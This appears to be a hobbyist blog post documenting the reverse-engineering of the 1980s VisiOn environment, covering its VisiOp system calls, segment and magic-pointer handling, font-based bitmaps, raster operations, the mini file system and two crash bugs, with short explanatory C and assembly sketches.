Figuring out the VisiOp calls was really challenging. The number of arguments for the call is always different, and even the arguments themselves differ between runs of the same program. This call is intense!

When a program starts, it asks the OS for the Application Manager data segment using syscall 0x18. From this segment, the program copies into its own segment:

  • 12 "virtual device" IDs unique to the copy of the application,
  • 1 long (segment+offset) pointer to Application Manager,
  • 2 more "system" IDs, and then
  • 170 more "function" IDs.

If you're just looking at disassembly, this operation is simply copying 372 bytes (12 + 2 + 2 + 170 = 186 words) from one segment to the other; see the sketch below.
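The copied block, as a C struct - a sketch following the list above; the field names are mine:

#include <stdint.h>

/* The 372-byte block copied from the Application Manager data
   segment at start-up. */
struct am_block {
    uint16_t device_ids[12];    /* per-copy "virtual device" IDs        */
    uint16_t am_offset;         /* long pointer to Application Manager  */
    uint16_t am_segment;        /*   ... (offset, then segment)         */
    uint16_t system_ids[2];     /* "system" IDs                         */
    uint16_t function_ids[170]; /* "function" IDs                       */
};
/* (12 + 2 + 2 + 170) * 2 == 372 bytes */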

When a program needs to call a VisiOp, the syscall 0x1e receives:

  • total number of arguments,
  • one of the "system" IDs,
  • one of the "function" IDs,
  • number of arguments minus 2 (i.e. not counting the two IDs above),
  • one of the "virtual device" IDs,
  • one or more extra arguments, some of which might be the application's segment ID.

Additionally, the application sets a flag at the segment+offset of the Application Manager before this call, and clears it after the call.
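Put into a C-like shape, the argument block for a VisiOp call looks roughly like this - a sketch of the observed order; the names and the fixed array size are mine:

#include <stdint.h>

/* Arguments passed to syscall 0x1e, in the order observed: */
struct visiop_args {
    uint16_t total_args;   /* total number of arguments            */
    uint16_t system_id;    /* one of the "system" IDs              */
    uint16_t function_id;  /* one of the "function" IDs            */
    uint16_t rest_args;    /* total_args - 2 (the two IDs above)   */
    uint16_t device_id;    /* one of the "virtual device" IDs      */
    uint16_t extra[6];     /* extra arguments; the count varies and
                              may include the app's segment ID     */
};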

# System IDs and Virtual Device IDs

My understanding of the Virtual Device IDs is limited and is based on the actions taken by the OS.

// VT = Virtual Terminal
#define DEVICE_VT 0x3
#define DEVICE_MEM 0x4
#define DEVICE_MENU 0xc

#define SYS_MESSAGE 0x0
#define SYS_CALL 0x1

The "Virtual Device" IDs are sort of similar to the list of "data types" from the article "The Visi On Operating Environment":

PROGRAM 
PROCESS 
MEMORY SEGMENT
PORT 
RASTER
DEVICE
FILE
BACKGROUND 
FONT
MOUSE
SOUNDMAKER 
KEYBOARD

But it can't be the same thing! Both "font management" (FONT) and "define clickable area" (MOUSE) are managed through DEVICE_VT. Did the specification for the system change between this article and the OS release? No idea.

# Function IDs

Things get really interesting and confusing if you consider that the 0x1e system call requires a "function" ID to operate. For example, if you want to load a font, you need to look up the "function" ID 0x18 and pass it along with DEVICE_VT.

As you can imagine, it is impossible to load a font into a DEVICE_MEM, and it is impossible to read a file from DEVICE_VT. What is the point of using both a device ID and a function ID, then? I don't know. But considering that we pass the number of arguments twice, perhaps there is no meaning to it. Perhaps VisiOps were implemented by two different teams who couldn't agree on how to pass the arguments between the VisiHost and the VisiMachine.

The true nature of "function" IDs is "magic" pointers. The "function ID" for any VisiOp is simply an offset to a function in the "magic" pointers list of the Application Manager. There are over 600 "magic" pointers in the Application Manager (you can find the list in SEG10003.VOS at offset 0xa600), but only 170 of them are used as VisiOps.

# Direct access to the memory manager

While VisiOn has a VisiOp that can copy data between two segments by their Segment IDs, every now and then it can be useful to resolve the physical address for a given memory segment. This is most definitely not a cross-platform approach, but VisiOn applications use it when they want to peek inside the Application Manager's data segment.

The memory access dance is done this way:

  1. Assume ES = OS segment
  2. The table of segments in the memory manager begins at segID2seg = es:[[es:0x6]+[es:0x4]]
  3. The word at es:[segID2seg+segID] stores flags of the segment ID (swapped in/out, used for read/write)
  4. The word at es:[segID2seg+segID+2] stores the physical location of the segment in the RAM, if it is loaded
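The same dance in C - a sketch over a raw dump of the OS data segment; the offsets are the ones from the steps above, the names and the flag interpretation are mine:

#include <stdint.h>

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }

/* es points at a dump of the OS (VisiHost) data segment. */
static void lookup_segment(const uint8_t *es, uint16_t seg_id,
                           uint16_t *flags, uint16_t *paragraph)
{
    uint16_t segid2seg = le16(es + le16(es + 0x6) + le16(es + 0x4));
    *flags     = le16(es + segid2seg + seg_id);     /* swapped in/out, r/w */
    *paragraph = le16(es + segid2seg + seg_id + 2); /* physical location   */
}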

If the segment is not present in RAM (swapped out), it is possible to ask the OS to load it for you. I highly suspect syscall 0x05 is responsible for segment loading, but most apps don't use it: all the normally required memory segments are present in RAM as if by "magic" anyway. The Pyramid game uses this call to ensure the font segment is in RAM. Without this call, the segment might not load in time on a slow machine like an XT; this is probably related to the DMA disk operations initiated by the OS.

# Outstanding hackery of bitmap displays

It isn't too difficult to use VisiOn's Virtual Terminal Device for text output and on-screen buttons, but displaying graphics and custom fonts required a bit of trial and error. The reason, of course, is the lack of references: VisiOn only displays images on the splash screen of programs like Word and Calc!

# Custom fonts as a bitmap format

I think there must be a VisiOp function for displaying a bitmapped image. But, for some reason, when VisiOn Calc draws a splash screen, it uses something completely different: a custom font.

The bitmapped image is divided into glyphs, the glyphs (1-127) are loaded as a font, and the image is then printed on the screen as if it were just a string. The Convert To Calc logo, printed with the default font, looks like this:

You can see that this method allows image compression: empty blocks are represented by spaces.

# Finding a Segment ID for a segment

The VisiOp "load font" loads a font from a Segment ID passed to it. This means an application must know how to find a (dynamically-assigned!) Segment ID for any of its segments. The code that resolves a Segment ID for a magic pointer 0x810 is so clever it made me flip my table:

mov ax, [cs:0x810+2]

Convert To Calc has multiple code and data segments. One of those segments has a table of "magic" pointers. The "magic" pointer at offset 0x810 is a "magic" pointer to the file with the font. So far, nothing out of the ordinary.

As I mentioned before, the operating system fills out the "magic" pointer table (list of entry points) with the Segment IDs when it starts an application. The Segment IDs are filled out "in place". The entry points list in the Tutorial app is stored in a segment that doesn't have any code in it.

But Convert To Calc has a couple of functions exported from the "entry points and magic pointers" segment. When a cross-segment call is made to such a function, the current list of magic pointers and Segment IDs is stored right in the same code segment. A "magic" pointer, simply being an offset from the beginning of the file, can be read with a simple mov:

mov ax, [cs:magic_pointer]   ;; entry point offset
mov ax, [cs:magic_pointer+2] ;; entry point Segment ID

So, mov ax, [cs:0x810+2] called from the code segment with the entry points table allows the program to know what Segment ID was assigned to the font segment.

# ROPs

Printing text through VisiOn's virtual terminal in graphics mode behaves, for all intents and purposes, like a proper Bit blit. One of the VisiOp parameters accepts a ROP code ("Raster OPeration").

VisiOn takes an interesting approach to ROPs and bitmap displaying. You might know that Windows supported ternary BitBLT with JIT-generated machine code for display rendering. VisiOn uses binary ROPs, similar to the ROPs in Xerox Alto or Bell Labs BLIT, and it also produces JIT machine code, but it produces the code for the "glyph space".

Among other things, when you load a font, VisiOn will break each character into bits and then emit the machine code that will produce the required bits. Basically, if your font array was font[char_id][bit_num], it will be converted into font_jit[bit_num][char_id]. I am not sure why; maybe there are some performance benefits to this approach.
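The transposition itself is simple. A sketch, assuming an 8-row glyph where each array element holds one row of bits; the real thing inside VisiOn is, of course, emitted machine code rather than an array:

enum { CHARS = 128, ROWS = 8 };

/* Turn font[char_id][bit_num] into font_jit[bit_num][char_id]. */
void transpose_font(const unsigned char font[CHARS][ROWS],
                    unsigned char font_jit[ROWS][CHARS])
{
    for (int c = 0; c < CHARS; c++)
        for (int b = 0; b < ROWS; b++)
            font_jit[b][c] = font[c][b];
}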

If this sounds like an unnecessary headache, remember that bitmapped output on CGA is a headache already. The screen buffer in CGA is interlaced: odd and even lines are stored in separate memory blocks. The pixels on the screen are bit-packed, too. If you want to plot a pixel at coordinates (1,1), your program will need to:

  1. Understand if you're drawing a pixel on an even or on an odd line,
  2. Resolve the memory offset for the correct interlaced block,
  3. Divide the Y coordinate by 2, and the X coordinate by 8 to find the byte that stores the pixel,
  4. Read this byte from the video memory,
  5. Flip a single bit in this byte, corresponding to the pixel you want to set or reset,
  6. Write the byte back.
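In C, the address calculation from these steps looks like this - a sketch for the 640x200 monochrome CGA mode, where the interlaced blocks are 0x2000 bytes apart and each scan line is 80 bytes:

#include <stdint.h>

/* Set the pixel at (x, y) in a 640x200 1-bpp CGA frame buffer. */
void cga_set_pixel(uint8_t *vram, int x, int y)
{
    uint16_t offset = (uint16_t)((y & 1) * 0x2000   /* odd/even block   */
                               + (y / 2) * 80       /* line in a block  */
                               + (x / 8));          /* byte in a line   */
    vram[offset] |= (uint8_t)(0x80 >> (x & 7));     /* flip one bit (OR) */
}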

These calculations are expensive, so it makes sense to make the video driver slightly more complicated but feature-rich. For example, if you're reading the byte from RAM anyway, you can choose between AND, OR, NOT, or XOR pixel operations for free.

There are 16 available ROPs in total. Here is a checkerboard background and a circle drawn on top of it with different ROPs:

# Mini-FS

Each application is shipped with something I call a "mini-file-system". Its format is primitive: the number of entries, a list of pointers to the entries, and then the entries themselves. Each entry has a header similar to the "segment header" used by the installer, consisting of a magic number and the length of the entry.
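A parser sketch for this layout. The field widths are my assumption, and I assume the entry header mirrors the installer's segment header: magic first, then length:

#include <stdint.h>
#include <stdio.h>

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }

/* Walk the mini-FS: an entry count, a list of pointers, then the
   entries, each starting with a (magic, length) header. */
void list_mini_fs(const uint8_t *fs)
{
    uint16_t count = le16(fs);
    for (uint16_t i = 0; i < count; i++) {
        uint16_t entry = le16(fs + 2 + 2 * i);   /* pointer to the entry */
        printf("entry %u: magic %04x, %u bytes\n", (unsigned)i,
               (unsigned)le16(fs + entry), (unsigned)le16(fs + entry + 2));
    }
}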

The mini-FS, among other things, is used for the built-in help system. Entries in the mini-FS can be referenced from the menu system, so the OS can "magically" display the right entry when the user clicks "HELP".

Naturally, the application can read entries from the mini-FS with a simple VisiOp call.

# What's next?

This reverse-engineering project ended up being much bigger than I anticipated. We have a working application, yes, but so far I've documented less than 10% of all the VisiHost and VisiOp calls. We still don't know how to implement keyboard input, or how to work with timers and background processes (if that is even possible).

Atsuko and I would like to continue working on this SDK, but considering our other projects, I cannot imagine it taking as much priority as it has so far. This may be as far as we get. But this is pretty far already. Anyone following these notes should be able to discover and document new VisiOps, say, from Word or Graph, very quickly.

# Bloopers

I discovered two funny bugs in the process of reverse-engineering.

# The window is too small!

If you've done any graphical programming for windowed environments, you would expect that the Create_Window() function requires window dimensions for a freshly-created window. VisiOn is free from such prejudice. As far as I can tell, applications are not supposed to freely decide what their window size should be. The Application Manager's option sheet has fields "window width" and "window height" that define the dimensions for most windows (except for the Application Manager, Help and Tutorial windows).

Naturally, the application can read the dimensions of its window so it can resize its contents. But if the window dimensions are too small, some applications crash and take the whole system down with them:

# Let me BEEP

VisiOn loves to beep at the user. It beeps every time a menu option is chosen or an on-screen button is clicked.

If you are tired of the noise, you'll appreciate that the Application Manager has an option to replace the sound with a "visual beep". It is implemented as a flashing 32x16-pixel area around the mouse cursor. Every time the flash is about to happen, the image "below" the cursor is saved in RAM to be restored after the "visual beep" is over. However, the memory allocated for this bitmap is never freed. It takes between 200 and 1000 clicks to fill the RAM with useless copies of the mouse cursor, and then the system crashes.


# Thanks

Huge thanks to:

  • Atsuko Ito for moral support and for the actual Homebrew app implementation,
  • Tom Stepleton for proofreading and early feedback on this note,
  • Nathan Lineback for his extensive research into VisiOn, and for his software preservation efforts,
  • VisiOn developers,
  • you, the reader!